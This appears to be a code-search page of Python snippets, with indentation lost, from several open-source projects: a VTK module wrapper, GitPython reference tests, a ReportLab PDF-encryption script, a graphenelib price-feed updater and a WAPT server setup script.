# This builds the scalar tree and makes it cacheable
def compute(self):
self.is_cacheable = lambda *args, **kwargs: True
old_compute(self)
self.vtkInstance.BuildTree()
return compute
def guarded_SetFileName_wrap_compute(old_compute):
# This checks for the presence of file in VTK readers
def compute(self):
# Skips the check if it's a vtkImageReader or vtkPLOT3DReader, because
# it has other ways of specifying files, like SetFilePrefix for
# multiple files
if any(issubclass(self.vtkClass, x)
for x in
[vtk.vtkBYUReader,
vtk.vtkImageReader,
vtk.vtkPLOT3DReader,
vtk.vtkDICOMImageReader,
vtk.vtkTIFFReader]):
old_compute(self)
return
if self.has_input('SetFileName'):
name = self.get_input('SetFileName')
elif self.has_input('SetFile'):
name = self.get_input('SetFile').name
else:
raise ModuleError(self, 'Missing filename')
if not os.path.isfile(name):
raise ModuleError(self, 'File does not exist')
old_compute(self)
return compute
def compute_SetDiffuseColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetDiffuseColorWidget(self, color):
self.vtkInstance.SetDiffuseColor(color.tuple)
return call_SetDiffuseColorWidget
def compute_SetAmbientColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetAmbientColorWidget(self, color):
self.vtkInstance.SetAmbientColor(color.tuple)
return call_SetAmbientColorWidget
def compute_SetSpecularColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetSpecularColorWidget(self, color):
self.vtkInstance.SetSpecularColor(color.tuple)
return call_SetSpecularColorWidget
def compute_SetColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetColorWidget(self, color):
self.vtkInstance.SetColor(color.tuple)
return call_SetColorWidget
def compute_SetEdgeColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetEdgeColorWidget(self, color):
self.vtkInstance.SetEdgeColor(color.tuple)
return call_SetEdgeColorWidget
def compute_SetBackgroundWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetBackgroundWidget(self, color):
self.vtkInstance.SetBackground(color.tuple)
return call_SetBackgroundWidget
def compute_SetBackground2Widget(old_compute):
if old_compute != None:
return old_compute
def call_SetBackground2Widget(self, color):
self.vtkInstance.SetBackground2(color.tuple)
return call_SetBackground2Widget
def compute_SetVTKCell(old_compute):
if old_compute != None:
return old_compute
def call_SetRenderWindow(self, cellObj):
if cellObj.cellWidget:
self.vtkInstance.SetRenderWindow(cellObj.cellWidget.mRenWin)
return call_SetRenderWindow
def compute_SetTransferFunction(old_compute):
# This sets the transfer function
if old_compute != None:
return old_compute
def call_SetTransferFunction(self, tf):
tf.set_on_vtk_volume_property(self.vtkInstance)
return call_SetTransferFunction
def compute_SetPointData(old_compute):
if old_compute != None:
return old_compute
def call_SetPointData(self, pd):
self.vtkInstance.GetPointData().ShallowCopy(pd)
return call_SetPointData
def compute_SetCellData(old_compute):
if old_compute != None:
return old_compute
def call_SetCellData(self, cd):
self.vtkInstance.GetCellData().ShallowCopy(cd)
return call_SetCellData
def compute_SetPointIds(old_compute):
if old_compute != None:
return old_compute
def call_SetPointIds(self, point_ids):
self.vtkInstance.GetPointIds().SetNumberOfIds(point_ids.GetNumberOfIds())
for i in xrange(point_ids.GetNumberOfIds()):
self.vtkInstance.GetPointIds().SetId(i, point_ids.GetId(i))
return call_SetPointIds
def guarded_Writer_wrap_compute(old_compute):
# The behavior for vtkWriter subclasses is to call Write()
# If the user sets a name, we will create a file with that name
# If not, we will create a temporary file from the file pool
def compute(self):
old_compute(self)
fn = self.vtkInstance.GetFileName()
if not fn:
o = self.interpreter.filePool.create_file(suffix='.vtk')
self.vtkInstance.SetFileName(o.name)
else:
o = File()
o.name = fn
self.vtkInstance.Write()
self.set_output('file', o)
return compute
for var in dir(node.klass):
# Everyone that has a Set.*FileName should have a Set.*File port too
if set_file_name_pattern.match(var):
def get_compute_SetFile(method_name):
def compute_SetFile(old_compute):
if old_compute != None:
return old_compute
def call_SetFile(self, file_obj):
getattr(self.vtkInstance, method_name)(file_obj.name)
return call_SetFile
return compute_SetFile
update_dict('_special_input_function_' + var[:-4],
get_compute_SetFile(var))
if hasattr(node.klass, 'SetFileName'):
# ... BUT we only want to check existence of filenames on
# readers. VTK is nice enough to be consistent with names, but
# this is brittle..
if node.klass.__name__.endswith('Reader'):
if not node.klass.__name__.endswith('TiffReader'):
update_dict('compute', guarded_SetFileName_wrap_compute)
if hasattr(node.klass, 'SetRenderWindow'):
update_dict('_special_input_function_SetVTKCell',
compute_SetVTKCell)
#color gui wrapping
if hasattr(node.klass, 'SetDiffuseColor'):
update_dict('_special_input_function_SetDiffuseColorWidget',
compute_SetDiffuseColorWidget)
if hasattr(node.klass, 'SetAmbientColor'):
update_dict('_special_input_function_SetAmbientColorWidget',
compute_SetAmbientColorWidget)
if hasattr(node.klass, 'SetSpecularColor'):
update_dict('_special_input_function_SetSpecularColorWidget',
compute_SetSpecularColorWidget)
if hasattr(node.klass, 'SetEdgeColor'):
update_dict('_special_input_function_SetEdgeColorWidget',
compute_SetEdgeColorWidget)
if hasattr(node.klass, 'SetColor'):
update_dict('_special_input_function_SetColorWidget',
compute_SetColorWidget)
if (issubclass(node.klass, vtk.vtkRenderer) and
hasattr(node.klass, 'SetBackground')):
update_dict('_special_input_function_SetBackgroundWidget',
compute_SetBackgroundWidget)
if (issubclass(node.klass, vtk.vtkRenderer) and
hasattr(node.klass, 'SetBackground2')):
update_dict('_special_input_function_SetBackground2Widget',
compute_SetBackground2Widget)
if issubclass(node.klass, vtk.vtkWriter):
update_dict('compute', guarded_Writer_wrap_compute)
if issubclass(node.klass, vtk.vtkScalarTree):
update_dict('compute', guarded_SimpleScalarTree_wrap_compute)
if issubclass(node.klass, vtk.vtkVolumeProperty):
update_dict('_special_input_function_SetTransferFunction',
compute_SetTransferFunction)
if issubclass(node.klass, vtk.vtkDataSet):
update_dict('_special_input_function_SetPointData',
compute_SetPointData)
update_dict('_special_input_function_SetCellData',
compute_SetCellData)
if issubclass(node.klass, vtk.vtkCell):
update_dict('_special_input_function_SetPointIds',
compute_SetPointIds)
return class_dict_
0
Example 93
Project: GitPython Source File: test_refs.py
@with_rw_repo('0.1.6')
def test_head_reset(self, rw_repo):
cur_head = rw_repo.head
old_head_commit = cur_head.commit
new_head_commit = cur_head.ref.commit.parents[0]
cur_head.reset(new_head_commit, index=True) # index only
assert cur_head.reference.commit == new_head_commit
self.failUnlessRaises(ValueError, cur_head.reset, new_head_commit, index=False, working_tree=True)
new_head_commit = new_head_commit.parents[0]
cur_head.reset(new_head_commit, index=True, working_tree=True) # index + wt
assert cur_head.reference.commit == new_head_commit
# paths - make sure we have something to do
rw_repo.index.reset(old_head_commit.parents[0])
cur_head.reset(cur_head, paths="test")
cur_head.reset(new_head_commit, paths="lib")
# hard resets with paths don't work, its all or nothing
self.failUnlessRaises(GitCommandError, cur_head.reset, new_head_commit, working_tree=True, paths="lib")
# we can do a mixed reset, and then checkout from the index though
cur_head.reset(new_head_commit)
rw_repo.index.checkout(["lib"], force=True)
# now that we have a write write repo, change the HEAD reference - its
# like git-reset --soft
heads = rw_repo.heads
assert heads
for head in heads:
cur_head.reference = head
assert cur_head.reference == head
assert isinstance(cur_head.reference, Head)
assert cur_head.commit == head.commit
assert not cur_head.is_detached
# END for each head
# detach
active_head = heads[0]
curhead_commit = active_head.commit
cur_head.reference = curhead_commit
assert cur_head.commit == curhead_commit
assert cur_head.is_detached
self.failUnlessRaises(TypeError, getattr, cur_head, "reference")
# tags are references, hence we can point to them
some_tag = rw_repo.tags[0]
cur_head.reference = some_tag
assert not cur_head.is_detached
assert cur_head.commit == some_tag.commit
assert isinstance(cur_head.reference, TagReference)
# put HEAD back to a real head, otherwise everything else fails
cur_head.reference = active_head
# type check
self.failUnlessRaises(ValueError, setattr, cur_head, "reference", "that")
# head handling
commit = 'HEAD'
prev_head_commit = cur_head.commit
for count, new_name in enumerate(("my_new_head", "feature/feature1")):
actual_commit = commit + "^" * count
new_head = Head.create(rw_repo, new_name, actual_commit)
assert new_head.is_detached
assert cur_head.commit == prev_head_commit
assert isinstance(new_head, Head)
# already exists, but has the same value, so its fine
Head.create(rw_repo, new_name, new_head.commit)
# its not fine with a different value
self.failUnlessRaises(OSError, Head.create, rw_repo, new_name, new_head.commit.parents[0])
# force it
new_head = Head.create(rw_repo, new_name, actual_commit, force=True)
old_path = new_head.path
old_name = new_head.name
assert new_head.rename("hello").name == "hello"
assert new_head.rename("hello/world").name == "hello/world"
assert new_head.rename(old_name).name == old_name and new_head.path == old_path
# rename with force
tmp_head = Head.create(rw_repo, "tmphead")
self.failUnlessRaises(GitCommandError, tmp_head.rename, new_head)
tmp_head.rename(new_head, force=True)
assert tmp_head == new_head and tmp_head.object == new_head.object
logfile = RefLog.path(tmp_head)
assert osp.isfile(logfile)
Head.delete(rw_repo, tmp_head)
# deletion removes the log as well
assert not osp.isfile(logfile)
heads = rw_repo.heads
assert tmp_head not in heads and new_head not in heads
# force on deletion testing would be missing here, code looks okay though ;)
# END for each new head name
self.failUnlessRaises(TypeError, RemoteReference.create, rw_repo, "some_name")
# tag ref
tag_name = "5.0.2"
TagReference.create(rw_repo, tag_name)
self.failUnlessRaises(GitCommandError, TagReference.create, rw_repo, tag_name)
light_tag = TagReference.create(rw_repo, tag_name, "HEAD~1", force=True)
assert isinstance(light_tag, TagReference)
assert light_tag.name == tag_name
assert light_tag.commit == cur_head.commit.parents[0]
assert light_tag.tag is None
# tag with tag object
other_tag_name = "releases/1.0.2RC"
msg = "my mighty tag\nsecond line"
obj_tag = TagReference.create(rw_repo, other_tag_name, message=msg)
assert isinstance(obj_tag, TagReference)
assert obj_tag.name == other_tag_name
assert obj_tag.commit == cur_head.commit
assert obj_tag.tag is not None
TagReference.delete(rw_repo, light_tag, obj_tag)
tags = rw_repo.tags
assert light_tag not in tags and obj_tag not in tags
# remote deletion
remote_refs_so_far = 0
remotes = rw_repo.remotes
assert remotes
for remote in remotes:
refs = remote.refs
# If a HEAD exists, it must be deleted first. Otherwise it might
# end up pointing to an invalid ref it the ref was deleted before.
remote_head_name = "HEAD"
if remote_head_name in refs:
RemoteReference.delete(rw_repo, refs[remote_head_name])
del(refs[remote_head_name])
# END handle HEAD deletion
RemoteReference.delete(rw_repo, *refs)
remote_refs_so_far += len(refs)
for ref in refs:
assert ref.remote_name == remote.name
# END for each ref to delete
assert remote_refs_so_far
for remote in remotes:
# remotes without references should produce an empty list
self.assertEqual(remote.refs, [])
# END for each remote
# change where the active head points to
if cur_head.is_detached:
cur_head.reference = rw_repo.heads[0]
head = cur_head.reference
old_commit = head.commit
head.commit = old_commit.parents[0]
assert head.commit == old_commit.parents[0]
assert head.commit == cur_head.commit
head.commit = old_commit
# setting a non-commit as commit fails, but succeeds as object
head_tree = head.commit.tree
self.failUnlessRaises(ValueError, setattr, head, 'commit', head_tree)
assert head.commit == old_commit # and the ref did not change
# we allow heds to point to any object
head.object = head_tree
assert head.object == head_tree
# cannot query tree as commit
self.failUnlessRaises(TypeError, getattr, head, 'commit')
# set the commit directly using the head. This would never detach the head
assert not cur_head.is_detached
head.object = old_commit
cur_head.reference = head.commit
assert cur_head.is_detached
parent_commit = head.commit.parents[0]
assert cur_head.is_detached
cur_head.commit = parent_commit
assert cur_head.is_detached and cur_head.commit == parent_commit
cur_head.reference = head
assert not cur_head.is_detached
cur_head.commit = parent_commit
assert not cur_head.is_detached
assert head.commit == parent_commit
# test checkout
active_branch = rw_repo.active_branch
for head in rw_repo.heads:
checked_out_head = head.checkout()
assert checked_out_head == head
# END for each head to checkout
# checkout with branch creation
new_head = active_branch.checkout(b="new_head")
assert active_branch != rw_repo.active_branch
assert new_head == rw_repo.active_branch
# checkout with force as we have a changed a file
# clear file
open(new_head.commit.tree.blobs[-1].abspath, 'w').close()
assert len(new_head.commit.diff(None))
# create a new branch that is likely to touch the file we changed
far_away_head = rw_repo.create_head("far_head", 'HEAD~100')
self.failUnlessRaises(GitCommandError, far_away_head.checkout)
assert active_branch == active_branch.checkout(force=True)
assert rw_repo.head.reference != far_away_head
# test reference creation
partial_ref = 'sub/ref'
full_ref = 'refs/%s' % partial_ref
ref = Reference.create(rw_repo, partial_ref)
assert ref.path == full_ref
assert ref.object == rw_repo.head.commit
self.failUnlessRaises(OSError, Reference.create, rw_repo, full_ref, 'HEAD~20')
# it works if it is at the same spot though and points to the same reference
assert Reference.create(rw_repo, full_ref, 'HEAD').path == full_ref
Reference.delete(rw_repo, full_ref)
# recreate the reference using a full_ref
ref = Reference.create(rw_repo, full_ref)
assert ref.path == full_ref
assert ref.object == rw_repo.head.commit
# recreate using force
ref = Reference.create(rw_repo, partial_ref, 'HEAD~1', force=True)
assert ref.path == full_ref
assert ref.object == rw_repo.head.commit.parents[0]
# rename it
orig_obj = ref.object
for name in ('refs/absname', 'rela_name', 'feature/rela_name'):
ref_new_name = ref.rename(name)
assert isinstance(ref_new_name, Reference)
assert name in ref_new_name.path
assert ref_new_name.object == orig_obj
assert ref_new_name == ref
# END for each name type
# References that don't exist trigger an error if we want to access them
self.failUnlessRaises(ValueError, getattr, Reference(rw_repo, "refs/doesntexist"), 'commit')
# exists, fail unless we force
ex_ref_path = far_away_head.path
self.failUnlessRaises(OSError, ref.rename, ex_ref_path)
# if it points to the same commit it works
far_away_head.commit = ref.commit
ref.rename(ex_ref_path)
assert ref.path == ex_ref_path and ref.object == orig_obj
assert ref.rename(ref.path).path == ex_ref_path # rename to same name
# create symbolic refs
symref_path = "symrefs/sym"
symref = SymbolicReference.create(rw_repo, symref_path, cur_head.reference)
assert symref.path == symref_path
assert symref.reference == cur_head.reference
self.failUnlessRaises(OSError, SymbolicReference.create, rw_repo, symref_path, cur_head.reference.commit)
# it works if the new ref points to the same reference
SymbolicReference.create(rw_repo, symref.path, symref.reference).path == symref.path # @NoEffect
SymbolicReference.delete(rw_repo, symref)
# would raise if the symref wouldn't have been deletedpbl
symref = SymbolicReference.create(rw_repo, symref_path, cur_head.reference)
# test symbolic references which are not at default locations like HEAD
# or FETCH_HEAD - they may also be at spots in refs of course
symbol_ref_path = "refs/symbol_ref"
symref = SymbolicReference(rw_repo, symbol_ref_path)
assert symref.path == symbol_ref_path
symbol_ref_abspath = osp.join(rw_repo.git_dir, symref.path)
# set it
symref.reference = new_head
assert symref.reference == new_head
assert osp.isfile(symbol_ref_abspath)
assert symref.commit == new_head.commit
for name in ('absname', 'folder/rela_name'):
symref_new_name = symref.rename(name)
assert isinstance(symref_new_name, SymbolicReference)
assert name in symref_new_name.path
assert symref_new_name.reference == new_head
assert symref_new_name == symref
assert not symref.is_detached
# END for each ref
# create a new non-head ref just to be sure we handle it even if packed
Reference.create(rw_repo, full_ref)
# test ref listing - assure we have packed refs
rw_repo.git.pack_refs(all=True, prune=True)
heads = rw_repo.heads
assert heads
assert new_head in heads
assert active_branch in heads
assert rw_repo.tags
# we should be able to iterate all symbolic refs as well - in that case
# we should expect only symbolic references to be returned
for symref in SymbolicReference.iter_items(rw_repo):
assert not symref.is_detached
# when iterating references, we can get references and symrefs
# when deleting all refs, I'd expect them to be gone ! Even from
# the packed ones
# For this to work, we must not be on any branch
rw_repo.head.reference = rw_repo.head.commit
deleted_refs = set()
for ref in Reference.iter_items(rw_repo):
if ref.is_detached:
ref.delete(rw_repo, ref)
deleted_refs.add(ref)
# END delete ref
# END for each ref to iterate and to delete
assert deleted_refs
for ref in Reference.iter_items(rw_repo):
if ref.is_detached:
assert ref not in deleted_refs
# END for each ref
# reattach head - head will not be returned if it is not a symbolic
# ref
rw_repo.head.reference = Head.create(rw_repo, "master")
# At least the head should still exist
assert osp.isfile(osp.join(rw_repo.git_dir, 'HEAD'))
refs = list(SymbolicReference.iter_items(rw_repo))
assert len(refs) == 1
# test creation of new refs from scratch
for path in ("basename", "dir/somename", "dir2/subdir/basename"):
# REFERENCES
############
fpath = Reference.to_full_path(path)
ref_fp = Reference.from_path(rw_repo, fpath)
assert not ref_fp.is_valid()
ref = Reference(rw_repo, fpath)
assert ref == ref_fp
# can be created by assigning a commit
ref.commit = rw_repo.head.commit
assert ref.is_valid()
# if the assignment raises, the ref doesn't exist
Reference.delete(ref.repo, ref.path)
assert not ref.is_valid()
self.failUnlessRaises(ValueError, setattr, ref, 'commit', "nonsense")
assert not ref.is_valid()
# I am sure I had my reason to make it a class method at first, but
# now it doesn't make so much sense anymore, want an instance method as well
# See http://byronimo.lighthouseapp.com/projects/51787-gitpython/tickets/27
Reference.delete(ref.repo, ref.path)
assert not ref.is_valid()
ref.object = rw_repo.head.commit
assert ref.is_valid()
Reference.delete(ref.repo, ref.path)
assert not ref.is_valid()
self.failUnlessRaises(ValueError, setattr, ref, 'object', "nonsense")
assert not ref.is_valid()
0
Example 94
def scriptInterp():
sys_argv = sys.argv[:] # copy
usage = """PDFENCRYPT USAGE:
PdfEncrypt encrypts your PDF files.
Line mode usage:
% pdfencrypt.exe pdffile [-o ownerpassword] | [owner ownerpassword],
\t[-u userpassword] | [user userpassword],
\t[-p 1|0] | [printable 1|0],
\t[-m 1|0] | [modifiable 1|0],
\t[-c 1|0] | [copypastable 1|0],
\t[-a 1|0] | [annotatable 1|0],
\t[-s savefilename] | [savefile savefilename],
\t[-v 1|0] | [verbose 1|0],
\t[-e128], [encrypt128],
\t[-h] | [help]
-o or owner set the owner password.
-u or user set the user password.
-p or printable set the printable attribute (must be 1 or 0).
-m or modifiable sets the modifiable attribute (must be 1 or 0).
-c or copypastable sets the copypastable attribute (must be 1 or 0).
-a or annotatable sets the annotatable attribute (must be 1 or 0).
-s or savefile sets the name for the output PDF file
-v or verbose prints useful output to the screen.
(this defaults to 'pdffile_encrypted.pdf').
'-e128' or 'encrypt128' allows you to use 128 bit encryption (in beta).
-h or help prints this message.
See PdfEncryptIntro.pdf for more information.
"""
known_modes = ['-o', 'owner',
'-u', 'user',
'-p', 'printable',
'-m', 'modifiable',
'-c', 'copypastable',
'-a', 'annotatable',
'-s', 'savefile',
'-v', 'verbose',
'-h', 'help',
'-e128', 'encrypt128']
OWNER = ''
USER = ''
PRINTABLE = 1
MODIFIABLE = 1
COPYPASTABLE = 1
ANNOTATABLE = 1
SAVEFILE = 'encrypted.pdf'
#try:
caller = sys_argv[0] # may be required later - eg if called by security.py
argv = list(sys_argv)[1:]
if len(argv)>0:
if argv[0] == '-h' or argv[0] == 'help':
print(usage)
return
if len(argv)<2:
raise ValueError("Must include a filename and one or more arguments!")
if argv[0] not in known_modes:
infile = argv[0]
argv = argv[1:]
if not os.path.isfile(infile):
raise ValueError("Can't open input file '%s'!" % infile)
else:
raise ValueError("First argument must be name of the PDF input file!")
# meaningful name at this stage
STRENGTH = 40
if 'encrypt128' in argv:
STRENGTH = 128
argv.remove('encrypt128')
if '-e128' in argv:
STRENGTH = 128
argv.remove('-e128')
if ('-v' in argv) or ('verbose' in argv):
if '-v' in argv:
pos = argv.index('-v')
arg = "-v"
elif 'verbose' in argv:
pos = argv.index('verbose')
arg = "verbose"
try:
verbose = int(argv[pos+1])
except:
verbose = 1
argv.remove(argv[pos+1])
argv.remove(arg)
else:
from reportlab.rl_config import verbose
#argument, valid license variable, invalid license variable, text for print
arglist = (('-o', 'OWNER', OWNER, 'Owner password'),
('owner', 'OWNER', OWNER, 'Owner password'),
('-u', 'USER', USER, 'User password'),
('user', 'USER', USER, 'User password'),
('-p', 'PRINTABLE', PRINTABLE, "'Printable'"),
('printable', 'PRINTABLE', PRINTABLE, "'Printable'"),
('-m', 'MODIFIABLE', MODIFIABLE, "'Modifiable'"),
('modifiable', 'MODIFIABLE', MODIFIABLE, "'Modifiable'"),
('-c', 'COPYPASTABLE', COPYPASTABLE, "'Copypastable'"),
('copypastable', 'COPYPASTABLE', COPYPASTABLE, "'Copypastable'"),
('-a', 'ANNOTATABLE', ANNOTATABLE, "'Annotatable'"),
('annotatable', 'ANNOTATABLE', ANNOTATABLE, "'Annotatable'"),
('-s', 'SAVEFILE', SAVEFILE, "Output file"),
('savefile', 'SAVEFILE', SAVEFILE, "Output file"),
)
binaryrequired = ('-p', 'printable', '-m', 'modifiable', 'copypastable', '-c', 'annotatable', '-a')
for thisarg in arglist:
if thisarg[0] in argv:
pos = argv.index(thisarg[0])
if thisarg[0] in binaryrequired:
if argv[pos+1] not in ('1', '0'):
raise ValueError("%s value must be either '1' or '0'!" % thisarg[1])
try:
if argv[pos+1] not in known_modes:
if thisarg[0] in binaryrequired:
exec(thisarg[1] +' = int(argv[pos+1])')
else:
exec(thisarg[1] +' = argv[pos+1]')
if verbose:
print("%s set to: '%s'." % (thisarg[3], argv[pos+1]))
argv.remove(argv[pos+1])
argv.remove(thisarg[0])
except:
raise "Unable to set %s." % thisarg[3]
if verbose>4:
#useful if feeling paranoid and need to double check things at this point...
print("\ninfile:", infile)
print("STRENGTH:", STRENGTH)
print("SAVEFILE:", SAVEFILE)
print("USER:", USER)
print("OWNER:", OWNER)
print("PRINTABLE:", PRINTABLE)
print("MODIFIABLE:", MODIFIABLE)
print("COPYPASTABLE:", COPYPASTABLE)
print("ANNOTATABLE:", ANNOTATABLE)
print("SAVEFILE:", SAVEFILE)
print("VERBOSE:", verbose)
if SAVEFILE == 'encrypted.pdf':
if infile[-4:] == '.pdf' or infile[-4:] == '.PDF':
tinfile = infile[:-4]
else:
tinfile = infile
SAVEFILE = tinfile+"_encrypted.pdf"
filesize = encryptPdfOnDisk(infile, SAVEFILE, USER, OWNER,
PRINTABLE, MODIFIABLE, COPYPASTABLE, ANNOTATABLE,
strength=STRENGTH)
if verbose:
print("wrote output file '%s'(%s bytes)\n owner password is '%s'\n user password is '%s'" % (SAVEFILE, filesize, OWNER, USER))
if len(argv)>0:
raise ValueError("\nUnrecognised arguments : %s\nknown arguments are:\n%s" % (str(argv)[1:-1], known_modes))
else:
print(usage)
0
Example 95
Project: python-graphenelib Source File: pricefeeds.py
def update_price_feed() :
global derived_prices, config
state = {}
for asset in _all_assets + [core_symbol]:
price_median_blockchain[asset] = 0.0
lastUpdate[asset] = datetime.utcnow()
myCurrentFeed[asset] = {}
if configFile.blame != "latest" :
blameFile = config.configPath + "/blame/" + configFile.blame + ".json"
if os.path.isfile(blameFile) :
# Load data from disk for (faster) debugging and verification
with open(blameFile, 'r') as fp:
state = json.load(fp)
# Load feed sources
feed = state["feed"]
# Load configuration from old state
configStruct = state["config"]
for key in configStruct :
# Skip asset config
if key == "asset_config" :
continue
config.__dict__[key] = configStruct[key]
else :
sys.exit("Configuration error: Either set 'blame' to an existing " +
"block number from the blame/ to verify or set it to " +
"'latest' to run the script online! ")
else :
# Load configuration from file
config = configFile
# Get prices online from sources
pool = futures.ThreadPoolExecutor(max_workers=8)
feed = {}
mythreads = {}
for name in config.feedSources :
print("(%s)" % name, end="", flush=True)
mythreads[name] = pool.submit(config.feedSources[name].fetch)
for name in config.feedSources :
print(".", end="", flush=True)
feed[name] = mythreads[name].result()
# rpc variables about bts rpc ##############################################
rpc = GrapheneAPI(config.host, config.port, config.user, config.passwd)
fetch_from_wallet(rpc)
# Determine bts price ######################################################
derived_prices = derive_prices(feed)
# Only publish given feeds #################################################
price_feeds = {}
update_required = False
for asset in asset_list_publish :
# Get Final Price according to price metric
this_asset_config = config.asset_config[asset] if asset in config.asset_config else config.asset_config["default"]
price_metric = this_asset_config["metric"] if "metric" in this_asset_config else config.asset_config["default"]["metric"]
if (asset not in derived_prices or
core_symbol not in derived_prices[asset] or
price_metric not in derived_prices[asset][core_symbol]) :
print("Warning: Asset %s has no derived price!" % asset)
continue
if float(derived_prices[asset][core_symbol][price_metric]) > 0.0:
quote_precision_core = assets[asset]["precision"]
symbol = assets[asset]["symbol"]
assert symbol is not asset
base_precision_cer = assets[blockchain_feed_quote[asset]]["precision"] # core asset
core_price_cer = derived_prices[asset][core_symbol][price_metric] * 10 ** (quote_precision_core - base_precision_cer)
core_price_cer = fractions.Fraction.from_float(core_price_cer).limit_denominator(100000)
denominator_cer = core_price_cer.denominator
numerator_cer = core_price_cer.numerator
quote_precision_settle = assets[asset]["precision"]
symbol = assets[asset]["symbol"]
assert symbol is not asset
base_precision_settle = assets[blockchain_feed_quote[asset]]["precision"] # core asset
core_price_settle = derived_prices[asset]["short_backing_asset"][price_metric] * 10 ** (quote_precision_settle - base_precision_settle)
core_price_settle = fractions.Fraction.from_float(core_price_settle).limit_denominator(100000)
denominator_settle = core_price_settle.denominator
numerator_settle = core_price_settle.numerator
price_feed = {"settlement_price": {
"quote": {"asset_id": assets[blockchain_feed_quote[asset]]["id"],
"amount": denominator_settle
},
"base": {"asset_id": assets[asset]["id"],
"amount": numerator_settle
}
},
"maintenance_collateral_ratio" :
config.asset_config[symbol]["maintenance_collateral_ratio"]
if (symbol in config.asset_config and "maintenance_collateral_ratio" in config.asset_config[symbol])
else config.asset_config["default"]["maintenance_collateral_ratio"],
"maximum_short_squeeze_ratio" :
config.asset_config[symbol]["maximum_short_squeeze_ratio"]
if (symbol in config.asset_config and "maximum_short_squeeze_ratio" in config.asset_config[symbol])
else config.asset_config["default"]["maximum_short_squeeze_ratio"],
"core_exchange_rate": {
"quote": {"asset_id": "1.3.0",
"amount": int(denominator_cer * (
config.asset_config[symbol]["core_exchange_factor"]
if (symbol in config.asset_config and "core_exchange_factor" in config.asset_config[symbol])
else config.asset_config["default"]["core_exchange_factor"]))
},
"base": {"asset_id": assets[asset]["id"],
"amount": numerator_cer
}}}
asset_update_required = publish_rule(rpc, asset)
if asset_update_required :
update_required = True
price_feeds[symbol] = {"asset_id": assets[asset]["id"],
"feed": price_feed,
"publish": asset_update_required
}
else :
print("Warning: Asset %s has a negative derived price of %f (%s metric)!" % (asset, float(derived_prices[asset][price_metric]), price_metric))
continue
if not debug :
# Print some stats ##########################################################
print_stats(price_feeds)
# Verify results or store them ##############################################
configStruct = {}
for key in dir(config) :
if key[0] == "_" :
continue
if key == "feedSources" :
continue
if key == "feedsources" :
continue
if key == "subprocess" :
continue
if key == "os" :
continue
configStruct[key] = config.__dict__[key]
# Store State
state["feed"] = feed
state["derived_prices"] = derived_prices
state["price_feeds"] = price_feeds
state["lastblock"] = get_last_block(rpc)
state["config"] = configStruct
blameFile = config.configPath + "/blame/" + str(state["lastblock"]) + ".json"
with open(blameFile, 'w') as fp:
json.dump(state, fp)
print("Blamefile: " + blameFile)
# Check publish rules and publich feeds #####################################
if update_required and not debug :
publish = False
if config.ask_confirmation :
if rpc._confirm("Are you SURE you would like to publish this feed?") :
publish = True
else :
publish = True
if publish :
print("Update required! Forcing now!")
update_feed(rpc, price_feeds)
else :
print("no update required")
else :
# Verify results
print()
print("[Warning] This script is loading old data for debugging. No price can be published.\n" +
" Please set 'blame' to 'latest' if you are ready to go online!")
print()
compare_feeds(state["derived_prices"], derived_prices)
0
Example 96
Project: WAPT Source File: postconf.py
def main():
if postconf.yesno("Do you want to launch post configuration tool ?") != postconf.DIALOG_OK:
print "canceling wapt postconfiguration"
sys.exit(1)
if type_redhat():
if re.match('^SELinux status:.*enabled', subprocess.check_output('sestatus')):
postconf.msgbox('SELinux detected, tweaking httpd permissions.')
subprocess.check_call(['setsebool', '-P', 'httpd_can_network_connect', '1'])
postconf.msgbox('SELinux correctly configured for Apache reverse proxy')
if not os.path.isfile('/opt/wapt/conf/waptserver.ini'):
shutil.copyfile('/opt/wapt/waptserver/waptserver.ini.template','/opt/wapt/conf/waptserver.ini')
waptserver_ini = iniparse.RawConfigParser()
waptserver_ini.readfp(file('/opt/wapt/conf/waptserver.ini', 'rU'))
# no trailing slash
if type_debian():
wapt_folder = '/var/www/wapt'
elif type_redhat():
wapt_folder = '/var/www/html/wapt'
waptserver_ini.set('uwsgi','gid','httpd')
else:
print ('distrib not supported')
sys.exit(1)
if os.path.isdir(wapt_folder):
waptserver_ini.set('options','wapt_folder',wapt_folder)
else:
# for install on windows
# keep in sync with waptserver.py
wapt_folder = os.path.join(wapt_root_dir,'waptserver','repository','wapt')
if os.path.exists(os.path.join(wapt_root_dir, 'waptserver', 'wsus.py')):
waptserver_ini.set('uwsgi', 'attach-daemon', '/usr/bin/python /opt/wapt/waptserver/wapthuey.py wsus.huey')
if not waptserver_ini.has_option('options', 'wapt_password') or \
not waptserver_ini.get('options', 'wapt_password') or \
postconf.yesno("Do you want to reset admin password ?",yes_label='skip',no_label='reset') != postconf.DIALOG_OK:
wapt_password_ok = False
while not wapt_password_ok:
wapt_password = ''
wapt_password_check = ''
while wapt_password == '':
(code,wapt_password) = postconf.passwordbox("Please enter the wapt server password: ", insecure=True)
if code != postconf.DIALOG_OK:
exit(0)
while wapt_password_check == '':
(code,wapt_password_check) = postconf.passwordbox("Please enter the wapt server password again: ", insecure=True)
if code != postconf.DIALOG_OK:
exit(0)
if wapt_password != wapt_password_check:
postconf.msgbox('Password mismatch!')
else:
wapt_password_ok = True
password = hashlib.sha1(wapt_password).hexdigest()
waptserver_ini.set('options','wapt_password',password)
if not waptserver_ini.has_option('options', 'server_uuid'):
waptserver_ini.set('options', 'server_uuid', str(uuid.uuid1()))
with open('/opt/wapt/conf/waptserver.ini','w') as inifile:
subprocess.check_output("/bin/chmod 640 /opt/wapt/conf/waptserver.ini",shell=True)
subprocess.check_output("/bin/chown wapt /opt/wapt/conf/waptserver.ini",shell=True)
waptserver_ini.write(inifile)
final_msg = [
'Postconfiguration completed.',
]
enable_mongod()
enable_waptserver()
start_mongod()
start_waptserver()
reply = postconf.yesno("Do you want to configure apache?")
if reply == postconf.DIALOG_OK:
try:
fqdn = socket.getfqdn()
if not fqdn:
fqdn = 'wapt'
if '.' not in fqdn:
fqdn += '.lan'
msg = 'FQDN for the WAPT server (eg. wapt.acme.com)'
(code, reply) = postconf.inputbox(text=msg, width=len(msg)+4, init=fqdn)
if code != postconf.DIALOG_OK:
exit(1)
else:
fqdn = reply
# cleanup of old naming convention for the wapt vhost definition
if type_debian():
